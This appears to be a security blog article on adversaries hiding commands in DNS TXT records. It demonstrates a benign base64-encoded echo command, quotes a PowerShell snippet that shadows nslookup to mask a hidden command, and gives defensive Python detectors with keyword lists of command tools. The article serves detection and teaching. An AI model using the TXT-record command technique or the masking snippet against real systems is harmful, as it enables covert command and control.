Abusing DNS: Hiding Commands in TXT Records

Intro

While DNS TXT (text) records have legitimate purposes, it is important to be aware that adversaries can exploit them to hide content and commands. Adversaries may use DNS to communicate with systems under their control inside a victim network, all while the traffic appears normal and expected.

What are TXT DNS Records?

TXT (Text) records are DNS records used to store human-readable text data associated with a domain. They are designed to provide additional information related to the domain, such as verification, security, or configuration data, and are not directly involved in resolving a domain to an IP address.

Check out RFC 1464, “Using the Domain Name System To Store Arbitrary String Attributes”, if you would like to see the official notes. TXT records have a structure that allows the domain owner to store various types of information in text format. This includes SPF (Sender Policy Framework) records, DKIM (DomainKeys Identified Mail) keys, DMARC (Domain-based Message Authentication, Reporting and Conformance) policies, and ownership verification codes.

For instance, SPF records are used to define which mail servers are authorized to send email on behalf of a domain, while DKIM keys and DMARC policies are used to authenticate and verify email messages. Ownership verification codes can be added to a TXT record to verify domain ownership.

To provide an example, let’s see Google’s TXT records:

Abusing TXT Records

A domain owner has the ability to manage DNS records, including TXT records. This means that anyone with access to the DNS configuration can add or modify these records as they see fit.

To illustrate this process from an adversarial perspective, we’ve added a TXT record to this website and encoded the message “echo 'Echoing command from txt records!'” as the base64 text “ZWNobyAnRWNob2luZyBjb21tYW5kIGZyb20gdHh0IHJlY29yZHMhJw==” in the TXT record.

While this article does not cover the specifics of configuring DNS records, it is a relatively straightforward process, and many resources online explain the concepts. This example aims to demonstrate how easily adversaries can use TXT records to store and later execute commands.

Let’s query our domain’s TXT records and see what this looks like:

Perfect! It only took a few minutes for this record to propagate, and we can clearly see the encoded string in the TXT record. Now, let’s create a PowerShell command that pulls that string out of the query result by index:

Decode and run the encoded string:

Great! The echo command was successfully executed. However, it is important to recognize that adversaries are unlikely to issue benign commands such as this. Instead, they may use similar tactics to achieve more malicious objectives that support their end goals, such as downloading new malware or toolsets. It is essential to be aware of the potential for malicious abuse of TXT records and to implement effective security measures to detect and prevent such attacks.
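As an added example (not code from the original post), the following Python helper triages TXT record strings the way a defender reviewing DNS responses might: it separates well-known record formats (SPF, DKIM, DMARC, site verification) from strings that are valid base64 and decode to printable, command-like text. The sample records, the prefix and keyword lists, and the tolerance for missing padding are assumptions of this example; the last sample string is the base64 value the article placed in its own TXT record. Nothing here executes the decoded text; it only labels records for review.

```python
import base64
import re
import string

# Constructed sample TXT records for a fictitious zone (not real DNS answers).
# The final entry is the base64 string the article placed in its own TXT record.
SAMPLE_TXT_RECORDS = [
    "v=spf1 include:_spf.example.net ~all",
    "v=DKIM1; k=rsa; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC",
    "google-site-verification=abc123PLACEHOLDER",
    "ZWNobyAnRWNob2luZyBjb21tYW5kIGZyb20gdHh0IHJlY29yZHMhJw==",
]

# Prefixes of TXT record formats with a well-known, legitimate purpose (assumed list).
KNOWN_PREFIXES = ("v=spf1", "v=DKIM1", "v=DMARC1", "google-site-verification=", "MS=")

# Words that, in decoded text, suggest a shell or PowerShell command (assumed list).
COMMAND_HINTS = ("echo", "powershell", "iex", "invoke-", "cmd", "curl", "wget", "bash", "certutil")

BASE64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def try_base64_decode(value):
    """Return decoded text if value is base64 that decodes to printable text, else None.

    Missing '=' padding is tolerated, because records copied between tools often lose it
    (the article's own string is missing one '=' in some copies).
    """
    compact = value.replace(" ", "")
    if len(compact) < 8 or not BASE64_RE.match(compact):
        return None
    padded = compact + "=" * (-len(compact) % 4)
    try:
        # binascii.Error and UnicodeDecodeError are both ValueError subclasses.
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except ValueError:
        return None
    if not all(ch in string.printable for ch in text):
        return None
    return text


def classify_txt_record(value):
    """Classify one TXT record string for analyst review.

    Returns (label, decoded_text): 'known-format', 'decodes-to-command',
    'decodes-to-text', or 'opaque' (not base64, or base64 of binary data such as a key).
    """
    stripped = value.strip()
    if stripped.startswith(KNOWN_PREFIXES):
        return "known-format", None
    decoded = try_base64_decode(stripped)
    if decoded is None:
        return "opaque", None
    if any(hint in decoded.lower() for hint in COMMAND_HINTS):
        return "decodes-to-command", decoded
    return "decodes-to-text", decoded


def triage_txt_records(records):
    """Classify every record; returns a list of (record, label, decoded_text)."""
    return [(rec, *classify_txt_record(rec)) for rec in records]


if __name__ == "__main__":
    for rec, label, decoded in triage_txt_records(SAMPLE_TXT_RECORDS):
        print(f"{label:20} {rec[:40]!r:44} {decoded!r}")
```

A raw DKIM public key is also base64, but it decodes to DER bytes rather than printable text, so it stays "opaque" here; the signal worth escalating is a record that decodes cleanly to shell-like text, as the article's record does.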

Detection

It is essential to recognize that while this exercise serves as an example of how adversaries may exploit one aspect of DNS services, this type of tactic can be used for malicious purposes such as facilitating command and control (C2) communications, exfiltrating sensitive information, injecting malware, exploiting vulnerabilities, and more, depending on how data is stored in the TXT record. Malware, for instance, can be instructed to read TXT records controlled by an attacker to obtain command instructions for a botnet. Furthermore, DNS tunneling can be employed with this tactic to avoid detection.

Blue teams should be mindful of commands that perform nslookup functionality as seen in this article. Red Canary’s Atomic tests also show how adversaries can mask their commands by wrapping nslookup in a custom function and indexing into its output:

# Shadows nslookup with a function: it runs the real binary, discards its output, and
# returns an array whose last element is a constructed string ("powershell.exe " plus today's date).
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","powershell.exe " + (Get-Date).ToString('MM/dd/yyyy')) }
# [-1] selects the last element of that array, so the "lookup" yields the hidden string, not a DNS answer.
(nslookup -q=txt example.com 8.8.8.8)[-1]

Effective detection and prevention of DNS attacks require a comprehensive, multifaceted approach. Blue teams should implement measures to monitor DNS traffic and look for abnormal patterns or behavior.

Counting excessive DNS lookups is one useful technique that can identify potential DNS tunneling. Outlier DNS traffic, such as an excessive number of DNS lookups for a single domain or very few lookups to a single domain compared to other assets in the environment, can also be indicative of malicious activity.

It is also essential to use threat intelligence feeds to identify known malicious domains or IP addresses and to block or alert on any DNS requests for those assets. Feeds only cover known indicators, however; behavior-based detections are what catch the unknowns.
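The counting and outlier checks described above, as an added Python example that is not from the original article. It runs four checks over a constructed DNS query log: query volume per (client, domain) pair compared with the median pair, the share of TXT queries per client, long high-entropy labels in query names (the tunneling indicator), and matches against a constructed blocklist standing in for a threat-intelligence feed. The log format, thresholds, addresses and domain names are all assumptions of this example.

```python
import math
from collections import Counter

# Constructed DNS query log for a fictitious network (timestamp, client, qtype, qname); not real traffic.
NORMAL_LINES = [
    "2024-05-01T09:00:01 10.0.0.11 A www.example.com",
    "2024-05-01T09:00:02 10.0.0.11 A mail.example.com",
    "2024-05-01T09:00:03 10.0.0.11 AAAA www.example.com",
    "2024-05-01T09:00:04 10.0.0.12 A www.example.com",
    "2024-05-01T09:00:05 10.0.0.12 TXT example.com",
    "2024-05-01T09:00:06 10.0.0.12 A cdn.example.net",
    "2024-05-01T09:00:07 10.0.0.13 A www.example.com",
    "2024-05-01T09:00:08 10.0.0.13 A cdn.example.net",
]
# One host repeatedly asking for TXT records under a single domain with long labels: the shape of
# the command-retrieval and tunneling traffic the article describes. The labels are rotations of a
# fixed 32-character string, so their entropy is known exactly (4.0 bits per character).
_CHUNK = "0123456789abcdeffedcba9876543210"
SUSPECT_LINES = [
    f"2024-05-01T09:01:{i:02d} 10.0.0.99 TXT {_CHUNK[i:] + _CHUNK[:i]}.c2.badexample.test"
    for i in range(12)
]
SAMPLE_DNS_LOG = "\n".join(NORMAL_LINES + SUSPECT_LINES)

# Constructed threat-intelligence blocklist standing in for a real feed.
BLOCKLIST = {"badexample.test"}


def parse_log(text):
    """Yield (client, qtype, qname) from whitespace-separated log lines; skip malformed ones."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            _, client, qtype, qname = parts
            yield client, qtype.upper(), qname.lower().rstrip(".")


def base_domain(qname):
    """Approximate the registered domain as the last two labels (enough for this sample)."""
    return ".".join(qname.split(".")[-2:])


def shannon_entropy(text):
    """Bits of entropy per character over the string's own symbol frequencies."""
    counts = Counter(text)
    return -sum(c / len(text) * math.log2(c / len(text)) for c in counts.values())


def analyze_dns_log(text, blocklist, volume_factor=4, txt_ratio=0.5, label_len=20, entropy_min=3.0):
    """Return findings keyed by detection name (see the comments on each check)."""
    records = list(parse_log(text))
    pair_counts = Counter((client, base_domain(qname)) for client, _, qname in records)
    per_client = Counter(client for client, _, _ in records)
    txt_per_client = Counter(client for client, qtype, _ in records if qtype == "TXT")

    # Volume outlier: a (client, domain) pair queried far more often than the median pair.
    typical = sorted(pair_counts.values())[len(pair_counts) // 2]
    volume = [(pair, n) for pair, n in pair_counts.items() if n > volume_factor * typical]

    # TXT-heavy client: most of its queries are TXT, which ordinary hosts rarely need.
    txt_heavy = [
        c for c in per_client
        if per_client[c] >= 5 and txt_per_client[c] / per_client[c] > txt_ratio
    ]

    # Long, high-entropy labels: encoded data riding inside query names (tunneling).
    high_entropy = []
    for client, _, qname in records:
        if any(len(l) >= label_len and shannon_entropy(l) >= entropy_min for l in qname.split(".")):
            high_entropy.append((client, qname))

    # Threat intel: any query whose registered domain is on the blocklist.
    intel = sorted({(client, qname) for client, _, qname in records if base_domain(qname) in blocklist})

    return {
        "volume_outliers": volume,
        "txt_heavy_clients": txt_heavy,
        "high_entropy_labels": high_entropy,
        "blocklist_hits": intel,
    }


if __name__ == "__main__":
    for name, hits in analyze_dns_log(SAMPLE_DNS_LOG, BLOCKLIST).items():
        print(f"{name}: {len(hits)} finding(s)")
        for hit in hits[:3]:
            print("   ", hit)
```

The median-based volume check is deliberately relative rather than a fixed count, so it adapts to the environment's normal query rate; on real data, compute it per time window and per client population, and raise the minimum query count before judging a client TXT-heavy.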

Encoded commands in DNS records can also be used to conceal malicious activity. Adversaries may use standard encodings, such as the base64 shown above, or custom obfuscation to hide data or commands, making them difficult to detect.

Conclusion

TXT records are a type of DNS record used to store text-based data associated with a domain, such as verification, security, and configuration information. Adversaries can exploit TXT records to hide malicious content and commands within them, using them to communicate with systems under their control within a victim network while appearing as normal traffic.

It is important for blue teams to monitor DNS records and look for unusual DNS traffic, such as outlier lookups: an excessive number of DNS lookups for a single domain, or very few lookups to a single domain compared to other assets in the environment. This can help identify potential security threats and prevent attacks.